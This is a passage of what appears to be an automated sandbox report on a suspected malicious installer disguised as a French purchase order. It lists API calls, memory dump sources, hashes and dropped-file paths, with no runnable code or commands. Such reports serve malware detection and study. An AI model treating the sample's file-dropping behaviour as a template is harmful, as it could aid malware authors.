                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: InitializeMessageSendUninitialize
                                                        • String ID:
                                                        • API String ID: 2896919175-0
                                                        • Opcode ID: 9581bd5c9e3a5a381fcf752a9dd70ad08072693e91799a662e34e922ee423c40
                                                        • Instruction ID: 490961c689e4e2a5abeff1ab03112a1b506459fea5da82fd079fd8beaf77c0ba
                                                        • Opcode Fuzzy Hash: 9581bd5c9e3a5a381fcf752a9dd70ad08072693e91799a662e34e922ee423c40
                                                        • Instruction Fuzzy Hash: 10F090F76046019AEA216B549D01B1B77B0EBD0306F15C43EEF44722E1D67959428EAD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 00405973
                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                        • Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
                                                        • Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                        • Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(?,?,00405562,?,?,00000000,00405745,?,?,?,?), ref: 0040594F
                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405963
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                        • Instruction ID: a1f521dedfcb9a291c5df24485c3a4b06dfb9301352aac2cc664dc3a40c3e92f
                                                        • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                        • Instruction Fuzzy Hash: B0D0C972908120EBC2102738AD0889BBB55EB542717058B31F865A22B0C7304C52CAA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                        • Instruction ID: 692d63f4e87c936e9446e8fa18252424463a9f70da0c26dc4546bcf220c6e71a
                                                        • Opcode Fuzzy Hash: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                        • Instruction Fuzzy Hash: D7E08CB6250108BFDB40EFA4EE4BFA637ECFB14704F00C121BA08E7091CA78E5109B68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 908fdcaf31e4434756c9917c3feb3dae168d3dd914679bbb1a52510e135465b4
                                                        • Instruction ID: 9169326a2aec8439feca5866952fa18bd92df46eb8b4a67c681bb8a0ef40d438
                                                        • Opcode Fuzzy Hash: 908fdcaf31e4434756c9917c3feb3dae168d3dd914679bbb1a52510e135465b4
                                                        • Instruction Fuzzy Hash: CDD01277B08114E7DB00EBB9AE48A9E73A4FB50325F208637D111F11D0D3B98551EA29
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SendMessageA.USER32(000103F2,00000000,00000000,00000000), ref: 0040402A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                        • Instruction ID: e3adca175a6f9c0685291c658283386376a3739e196c394007d9a93dd14d7098
                                                        • Opcode Fuzzy Hash: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                        • Instruction Fuzzy Hash: 23C09B717443007BEA31CB509D49F0777587750741F5544357314F51D4C6B4F410D62D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SendMessageA.USER32(00000028,?,00000001,00403E32), ref: 0040400F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                        • Instruction ID: 72d9328d989bd28a4b04e8d0bfc49dcb98a3c5c69b67aa4312834a6063493829
                                                        • Opcode Fuzzy Hash: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                        • Instruction Fuzzy Hash: 54B01235685200BBEE324F00DD0DF497E72F764B02F008034B300240F0C6B300A5DB19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                        • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00403DCB), ref: 00403FF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: e35597bec60e1025900fee06943d1351a87652ae8cbe91aede0566df4541442b
                                                        • Instruction ID: ba8506c3699760f6a3e6afd6d9d514cfd718e0a5e630d9124f09760ea78015e0
                                                        • Opcode Fuzzy Hash: e35597bec60e1025900fee06943d1351a87652ae8cbe91aede0566df4541442b
                                                        • Instruction Fuzzy Hash: 73A01132808200AFCB028B00EE08C8ABF22BBA0300B02C030E200800B0CA320820FF8A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 0040495E
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404969
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049B3
                                                        • LoadBitmapA.USER32(0000006E), ref: 004049C6
                                                        • SetWindowLongA.USER32(?,000000FC,00404F3D), ref: 004049DF
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049F3
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A05
                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404A1B
                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A27
                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A39
                                                        • DeleteObject.GDI32(00000000), ref: 00404A3C
                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A67
                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A73
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B08
                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B33
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B47
                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404B76
                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B84
                                                        • ShowWindow.USER32(?,00000005), ref: 00404B95
                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C92
                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF7
                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D0C
                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D30
                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D50
                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404D65
                                                        • GlobalFree.KERNEL32(00000000), ref: 00404D75
                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DEE
                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404E97
                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA6
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EC6
                                                        • ShowWindow.USER32(?,00000000), ref: 00404F14
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F1F
                                                        • ShowWindow.USER32(00000000), ref: 00404F26
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $.>e$M$N
                                                        • API String ID: 1638840714-3732573515
                                                        • Opcode ID: 11184b33c8a0bad0ffedf065af9fcd562555c30c73c025eae7e35ea36ad120a5
                                                        • Instruction ID: 32328689aaf225a856d9d5e8400e1324cb9f7a0d0133e9a7d6c98aba065e8d61
                                                        • Opcode Fuzzy Hash: 11184b33c8a0bad0ffedf065af9fcd562555c30c73c025eae7e35ea36ad120a5
                                                        • Instruction Fuzzy Hash: 5D0270B0900209AFEB20DF54DD45AAE7BB5FB84315F10817AF610BA2E1D7789D42DF58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404459
                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404483
                                                        • SHBrowseForFolderA.SHELL32(?,0041F0B8,?), ref: 00404534
                                                        • CoTaskMemFree.OLE32(00000000), ref: 0040453F
                                                        • lstrcmpiA.KERNEL32(: Completed,Stedtillgs Setup: Completed), ref: 00404571
                                                        • lstrcatA.KERNEL32(?,: Completed), ref: 0040457D
                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040458F
                                                          • Part of subcall function 004054D6: GetDlgItemTextA.USER32(?,?,00000400,004045C6), ref: 004054E9
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FA1
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FB3
                                                          • Part of subcall function 00405F49: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FC3
                                                        • GetDiskFreeSpaceA.KERNEL32(0041ECB0,?,?,0000040F,?,0041ECB0,0041ECB0,?,00000000,0041ECB0,?,?,000003FB,?), ref: 0040464A
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404665
                                                        • SetDlgItemTextA.USER32(00000000,00000400,0041ECA0), ref: 004046EB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                        • String ID: .>e$: Completed$A$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168$Stedtillgs Setup: Completed
                                                        • API String ID: 2246997448-53277146
                                                        • Opcode ID: 99c887e1a025992634fa2cd334c38f52200385e1e80dd5a9bae78a5bdda81e84
                                                        • Instruction ID: 42693497c20c2ef9f3724f7af4168125946a8ca29daa8f58ebac9689f75dac72
                                                        • Opcode Fuzzy Hash: 99c887e1a025992634fa2cd334c38f52200385e1e80dd5a9bae78a5bdda81e84
                                                        • Instruction Fuzzy Hash: B49170B1900209ABDB11AFA1CD85BAF77B8EF85314F10847BF701B62C1D77C9A418B69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 004055C7
                                                        • lstrcatA.KERNEL32(00420CE8,\*.*,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 0040560F
                                                        • lstrcatA.KERNEL32(?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405630
                                                        • lstrlenA.KERNEL32(?,?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405636
                                                        • FindFirstFileA.KERNEL32(00420CE8,?,?,?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405647
                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F4
                                                        • FindClose.KERNEL32(00000000), ref: 00405705
                                                        Strings
                                                        • "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe", xrefs: 0040559E
                                                        • \*.*, xrefs: 00405609
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004055AC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                        • API String ID: 2035342205-1487684437
                                                        • Opcode ID: fe0f3c39c984bb9ebd9394961c36f543a8328fa7226fa6d9f9a49b85abb32e2f
                                                        • Instruction ID: f8ba85616855857cc059e9ef13111783737efc0c899630c1c9014c5665c50712
                                                        • Opcode Fuzzy Hash: fe0f3c39c984bb9ebd9394961c36f543a8328fa7226fa6d9f9a49b85abb32e2f
                                                        • Instruction Fuzzy Hash: 34510070804A04BADB21BB658D45FBF7A78DB42314F54413BF445721D2D73C8982EE6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                                        Strings
                                                        • C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine, xrefs: 004020CB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine
                                                        • API String ID: 123533781-3329137258
                                                        • Opcode ID: c8cab231879d06915c7cf320fa1d6cd04015ac96f124f4d9f47e0b6c32f70abe
                                                        • Instruction ID: 06e6b23027def8a4d5e6b724cf519ff4addaa20e67256fcdff0c37d24eef8e92
                                                        • Opcode Fuzzy Hash: c8cab231879d06915c7cf320fa1d6cd04015ac96f124f4d9f47e0b6c32f70abe
